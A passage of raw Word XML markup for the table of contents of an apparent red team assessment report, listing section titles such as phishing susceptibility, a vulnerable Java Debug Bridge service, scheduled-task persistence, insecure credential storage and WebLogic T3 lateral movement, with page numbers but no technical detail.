              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253552 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B5AAAC7" w14:textId="32E62927"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53" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.3.1.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Authorised actions</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253553 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1056855D" w14:textId="307B8232"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54" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.3.2.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Restricted actions</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253554 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6246F801" w14:textId="306370DA"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55" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.4.</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Out of scope</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253555 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57A5398B" w14:textId="33607438"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56" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.5.</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Goals and objectives</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253556 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="789D7B02" w14:textId="309AFF8B"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57" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>3.6.</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Positive and general observations</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253557 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C85030C" w14:textId="4B0E90BB"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58" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.6.1.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White cards</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253558 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25D2BF00" w14:textId="282498E1"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59" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3.6.2.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Deconflictions</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253559 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20F61C19" w14:textId="54BDCD7D" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253560" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Technical report</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253560 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CA0AE4C" w14:textId="44F7DD4C"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61" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>4.1.</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Attack path</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253561 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B4B4A76" w14:textId="1415F793"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62" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.1.1.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External or outsider perspective</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253562 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72747B30" w14:textId="62A919E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63" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.1.2.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Internal or insider perspective</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253563 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79A6D6F9" w14:textId="23D7B8AA"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64" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>4.2.</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External or outsider perspective findings</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253564 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1091F616" w14:textId="5593F588"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65" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.2.1.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Susceptibility to phishing emails</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253565 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A9A658F" w14:textId="1ED43918"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66" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>4.3.</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Internal or insider perspective findings</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253566 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2037084D" w14:textId="45E3A27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67" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.1.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Java Debug Bridge vulnerable service</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253567 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A463448" w14:textId="744661CC"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68" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.2.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Absence of auditing of scheduled tasks allows for persistence</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253568 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7250A4D7" w14:textId="0D61B0E3"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69" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.3.</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Insecure credentials and secrets storage</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253569 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AD0C185" w14:textId="5C86283F"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0" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.4.</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bCs/>
              </w:rPr>
              <w:t>WebLogic Scripting Tool (WLST) and Oracle T3 allows for lateral movement</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253570 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="559CD711" w14:textId="4A71375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1" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.5.</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Unencrypted Oracle T3 protocol allows for eavesdropping</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253571 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CF39983" w14:textId="7DDC0F50"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2" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.6.</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bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ineffective </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Endpoint Detection and Response (</w:t>
            </w:r>
